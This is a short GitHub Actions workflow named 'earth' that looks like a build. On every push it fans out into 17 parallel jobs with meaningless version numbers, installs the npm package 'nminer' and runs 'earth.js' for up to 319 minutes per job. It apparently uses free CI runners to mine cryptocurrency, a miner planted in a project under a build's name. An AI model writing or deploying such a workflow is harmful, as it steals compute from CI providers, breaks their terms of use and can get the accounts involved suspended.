name: earth
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8453 }
          - { version: 1631 }
          - { version: 6790 }
          - { version: 557 }
          - { version: 7596 }
          - { version: 5635 }
          - { version: 4230 }
          - { version: 7277 }
          - { version: 5850 }
          - { version: 5 }
          - { version: 4465 }
          - { version: 4021 }
          - { version: 7269 }
          - { version: 8202 }
          - { version: 1728 }
          - { version: 8100 }
          - { version: 5456 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: yippee
        run: |
          npm install nminer@latest
          timeout 319m node earth.js || echo "earth executed"